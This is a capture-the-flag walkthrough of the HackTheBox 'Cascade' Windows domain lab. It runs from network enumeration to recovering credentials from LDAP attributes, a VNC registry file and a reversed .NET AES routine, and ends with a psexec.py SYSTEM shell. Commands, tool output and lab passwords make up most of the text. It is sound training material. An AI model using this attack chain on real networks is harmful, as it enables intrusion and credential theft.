HackTheBox - Cascade | Walkthrough
Enumeration
Let's start!
First let's create a directory for this box.
mkdir ~/hackthebox/cascade
cd ~/hackthebox/cascade
Now, to find out what's going on in the box, let's run nmap.
nmap -A 10.10.10.182 -o nmap
# Nmap 7.80 scan initiated Sun Mar 29 21:47:34 2020 as: nmap -A -o nmap 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up (0.19s latency).
Not shown: 987 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-29 16:02:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: phone|general purpose|specialized
Running (JUST GUESSING): Microsoft Windows Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Vista SP2 (91%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -26s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-03-29T16:03:43
|_ start_date: 2020-03-29T15:28:10
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 186.64 ms 10.10.14.1
2 186.82 ms 10.10.10.182
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 29 21:51:46 2020 -- 1 IP address (1 host up) scanned in 251.67 seconds
Now, as with most Windows boxes, I like to run enum4linux. Let's see if it gives us something.
enum4linux -a 10.10.10.182 | tee enum4linux
So, we got a list of users, let's extract it.
cat enum4linux | grep "Account: " | awk '{print $8}' | tee users.txt
a.turnbull
arksvc
b.hanson
BackupSvc
CascGuest
d.burman
e.crowe
i.croft
j.allen
j.goodhand
j.wakefield
r.thompson
s.hickson
s.smith
util
Let's add the domain name in our /etc/hosts file.
vi /etc/hosts
10.10.10.182 cascade.local
Let's try ldapsearch as well.
ldapsearch -h 10.10.10.182 -p 389 -x -b "dc=cascade,dc=local" | tee ldapsearch
Wow, that's a lot of data.
Takeaway:
(For user r.thompson)
cascadeLegacyPwd: clk0bjVldmE=
operatingSystem: Windows Server 2008 R2 Standard
operatingSystemVersion: 6.1 (7601)
operatingSystemServicePack: Service Pack 1
Interesting, now we have a base64 string, let's decode it.
root@kali:~/hackthebox/cascade# echo "clk0bjVldmE=" | base64 -d
rY4n5eva
Now, let's try these creds with crackmapexec.
root@kali:~/hackthebox/cascade# crackmapexec smb 10.10.10.182 -u r.thompson -p rY4n5eva
CME 10.10.10.182:445 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:CASCADE)
CME 10.10.10.182:445 CASC-DC1 [+] CASCADE\r.thompson:rY4n5eva
[*] KTHXBYE!
Nice. Now, let's try to list shares.
root@kali:~/hackthebox/cascade# crackmapexec smb 10.10.10.182 -u r.thompson -p rY4n5eva --shares
CME 10.10.10.182:445 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:CASCADE)
CME 10.10.10.182:445 CASC-DC1 [+] CASCADE\r.thompson:rY4n5eva
CME 10.10.10.182:445 CASC-DC1 [+] Enumerating shares
CME 10.10.10.182:445 CASC-DC1 SHARE Permissions
CME 10.10.10.182:445 CASC-DC1 ----- -----------
CME 10.10.10.182:445 CASC-DC1 ADMIN$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 IPC$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 SYSVOL READ
CME 10.10.10.182:445 CASC-DC1 Audit$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 C$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 print$ READ
CME 10.10.10.182:445 CASC-DC1 NETLOGON READ
CME 10.10.10.182:445 CASC-DC1 Data READ
[*] KTHXBYE!
User
So, we have read permissions in some of the stares. Now, let's try to access them!
root@kali:~/hackthebox/cascade# smbclient -U r.thompson \\\\10.10.10.182\\Data
Enter WORKGROUP\r.thompson's password:
smb: \> ls
smb: \> recurse on
smb: \> ls
You should see that there is Meeting_Notes_June_2018.html file in Email archives. It looks interesting. Let's see what it is.
We see that the email mentions the username, TempAdmin and the password to be the "normal admin account password". Interesting.
You should find another file, VNC install.reg
If you download that file and cat it, you should see a hex password.
cat VNC\ Install.reg
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
Searching for VNC password decoder, you should find this Github repo:
https://github.com/trinitronx/vncpasswd.py
root@kali:~/hackthebox/cascade# git clone https://github.com/trinitronx/vncpasswd.py.git vncpasswd.py
cd vncpasswd.py
root@kali:~/hackthebox/cascade# ./vncpasswd.py -d -H 6bcf2a4b6e5aca0f
Cannot read from Windows Registry on a Linux system
Cannot write to Windows Registry on a Linux system
Decrypted Bin Pass= 'sT333ve2'
Decrypted Hex Pass= '7354333333766532'
Now, we have Steve's password.
Let's try to login using evil-winrm.
./evil-winrm.rb -i 10.10.10.182 -u s.smith -p sT333ve2
Nice, we are in.
User 2
*Evil-WinRM* PS C:\Users\s.smith\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
=============== ==============================================
cascade\s.smith S-1-5-21-3332504370-1206983947-1165150453-1107
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share Alias S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Audit Share Alias S-1-5-21-3332504370-1206983947-1165150453-1137 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT Alias S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users Alias S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Now, let's get winPEAS.
*Evil-WinRM* PS C:\Users\s.smith\Documents> upload /root/hackthebox/remote/winPEAS.exe .
Run winPEAS.exe
.\winPEAS.exe
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : CASCADE
DefaultUserName : vbscrub
[+] Unnattend Files()
C:\Windows\Panther\Unattend.xml
<Password>*SENSITIVE*DATA*DELETED*</Password> <Enabled>true</Enabled> <Username>vbscrub</Username> </AutoLogon> <UserAccounts> <LocalAccounts> <LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
Now, let's see if we can do somethings with these credentials that we couldn't do earlier.
root@kali:~/Desktop# crackmapexec smb 10.10.10.182 -u s.smith -p sT333ve2
CME 10.10.10.182:445 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:CASCADE)
CME 10.10.10.182:445 CASC-DC1 [+] CASCADE\s.smith:sT333ve2
[*] KTHXBYE!
root@kali:~/Desktop# crackmapexec smb 10.10.10.182 -u s.smith -p sT333ve2 --shares
CME 10.10.10.182:445 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:CASCADE)
CME 10.10.10.182:445 CASC-DC1 [+] CASCADE\s.smith:sT333ve2
CME 10.10.10.182:445 CASC-DC1 [+] Enumerating shares
CME 10.10.10.182:445 CASC-DC1 SHARE Permissions
CME 10.10.10.182:445 CASC-DC1 ----- -----------
CME 10.10.10.182:445 CASC-DC1 ADMIN$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 IPC$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 SYSVOL READ
CME 10.10.10.182:445 CASC-DC1 Audit$ READ
CME 10.10.10.182:445 CASC-DC1 C$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 print$ READ
CME 10.10.10.182:445 CASC-DC1 NETLOGON READ
CME 10.10.10.182:445 CASC-DC1 Data READ
[*] KTHXBYE!
Now, let's enumerate those shares.
Let's check the Audit$ share.
smbclient -U s.smith \\\\10.10.10.182\\Audit$
smb: \> ls
smb: \> recurse on
smb: \> ls
We see a few interesting files here. The Audit.db, CascAudit.exe and RunAudit.bat.
Let's download all of those.
smb: \> get CascAudit.exe
smb: \> get RunAudit.bat
smb: \> get DB\Audit.db
Now, in our Kali machine, let's see what's in the bat file.
cat RunAudit.bat
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"
Hmm, seems like, its running the exe and sending the Audit.db file as a parameter to it.
If we check the Audit.db file, we should see that its a database file, and has a password column as well. However, the password seems to be base64 encoded and just decoding it gives us something weird.
So, maybe it is running the CascAudit.exe file to encrypt the password.
Seems like we will need to get the CascCrypto.dll file as well.
smb: \> get CascCrypto.dll
So, its Reverse Engineering. I haven't done much of it, and just thinking of it I'm kinda getting pissed.
Download the decomplier from here:
https://github.com/icsharpcode/AvaloniaILSpy
mkdir /tools/ILSpy/
mv ILSpy-linux-x64-Release.zip /tools/ILSpy/
cd /tools/ILSpy/
unzip ILSpy-linux-x64-Release.zip
chmod a+x ILSpy
./ILSpy
Selecting the dll file, we see that, it seems to be using AES crypto.
public static string DecryptString(string EncryptedString, string Key)
{
//Discarded unreachable code: IL_009e
byte[] array = Convert.FromBase64String(EncryptedString);
Aes aes = Aes.Create();
aes.KeySize = 128;
aes.BlockSize = 128;
aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
aes.Mode = CipherMode.CBC;
aes.Key = Encoding.UTF8.GetBytes(Key);
using (MemoryStream stream = new MemoryStream(array)){
using (CryptoStream cryptoStream = new CryptoStream(stream, aes.CreateDecryptor(), CryptoStreamMode.Read))
{
byte[] array2 = new byte[checked(array.Length - 1 + 1)];
cryptoStream.Read(array2, 0, array2.Length);
return Encoding.UTF8.GetString(array2);
}
}
Here, we have the IV.
Now, it seems like we need to reverse engineer the exe file to get the key. Yikes.
Select the exe file.
Going through it, we find the key.
Type: AES
Key: c4scadek3y654321
IV: 1tdyjCbY1Ix49842
Using CyberChef to decode it we get the password: w3lc0meFr31nd
Phew.
https://gchq.github.io/CyberChef/
This is the password for the user, ArkSvc.
./evil-winrm.rb -i 10.10.10.182 -u ArkSvc -p w3lc0meFr31nd
Administrator
Damn, this has been one hell of a journey so far. Tough box.
Now, let's just recall the things that we know.
- We know that they use a new account called TempAdmin.
- We know that its password is the same as the normal account.
Following the pattern with this box, let's list the smb shares available to this account!
root@kali:~# crackmapexec smb 10.10.10.182 -u ArkSvc -p w3lc0meFr31nd --shares
CME 10.10.10.182:445 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:CASCADE)
CME 10.10.10.182:445 CASC-DC1 [+] CASCADE\ArkSvc:w3lc0meFr31nd
CME 10.10.10.182:445 CASC-DC1 [+] Enumerating shares
CME 10.10.10.182:445 CASC-DC1 SHARE Permissions
CME 10.10.10.182:445 CASC-DC1 ----- -----------
CME 10.10.10.182:445 CASC-DC1 ADMIN$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 IPC$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 SYSVOL READ
CME 10.10.10.182:445 CASC-DC1 Audit$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 C$ NO ACCESS
CME 10.10.10.182:445 CASC-DC1 print$ READ
CME 10.10.10.182:445 CASC-DC1 NETLOGON READ
CME 10.10.10.182:445 CASC-DC1 Data READ
[*] KTHXBYE!
root@kali:~# smbclient -U ArkSvc \\\\10.10.10.182\\Data
Enter WORKGROUP\ArkSvc's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 27 09:12:34 2020
.. D 0 Mon Jan 27 09:12:34 2020
Contractors D 0 Mon Jan 13 07:30:11 2020
Finance D 0 Mon Jan 13 07:30:06 2020
IT D 0 Tue Jan 28 23:49:51 2020
Production D 0 Mon Jan 13 07:30:18 2020
Temps D 0 Mon Jan 13 07:30:15 2020
13106687 blocks of size 4096. 7793454 blocks available
smb: \> recurse on
Doing another ls you should see there is a Recycle Bin log file.
smb: \> get IT\Logs\"Ark AD Recycle Bin"\ArkAdRecycleBin.log
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log (1.7 KiloBytes/sec) (average 1.7 KiloBytes/sec)
smb: \>
If we read the file, we can see the we have permission to work with the Recycle Bin. Also, it seems that the TempAdmin user has been recently deleted. Weird.
Now, let's try to restore the user.
https://docs.microsoft.com/en-us/powershell/module/addsadministration/restore-adobject?view=win10-ps
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'samaccountname -eq "TempAdmin"' -IncludeDeletedObjects
Deleted : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
Now, let's try to restore the user.
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'samaccountname -eq "TempAdmin"' -IncludeDeletedObjects | Restore-ADObject
Insufficient access rights to perform the operation
At line:1 char:80
+ ... ccountname -eq "TempAdmin"' -IncludeDeletedObjects | Restore-ADObject
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (CN=TempAdmin\0A...ascade,DC=local:ADObject) [Restore-ADObject], ADException
+ FullyQualifiedErrorId : 0,Microsoft.ActiveDirectory.Management.Commands.RestoreADObject
Wait what? Insufficient access rights? Really?
But, still, let's check the properties of the user.
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'samaccountname -eq "TempAdmin"' -IncludeDeletedObjects -Properties *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : TempAdmin@cascade.local
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM
Wow, okay we see cascadeLegacyPwd. That's how we got the password of our first user. Let's base64 decode it.
root@kali:~/Desktop# echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
baCT3r1aN00dles
Now, as mentioned earlier, the password of TempAdmin is the same as that of normal Administrator. Let's try to get a shell.
Let's use psexec.py this time!
root@kali:/usr/share/doc/python3-impacket/examples# ./psexec.py cascade.local/Administrator:"baCT3r1aN00dles"@10.10.10.182
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.182.....
[*] Found writable share ADMIN$
[*] Uploading file MelpKkvH.exe
[*] Opening SVCManager on 10.10.10.182.....
[*] Creating service tCEG on 10.10.10.182.....
[*] Starting service tCEG.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
Nice. That's all.
Congratulations! That's one hell of a box!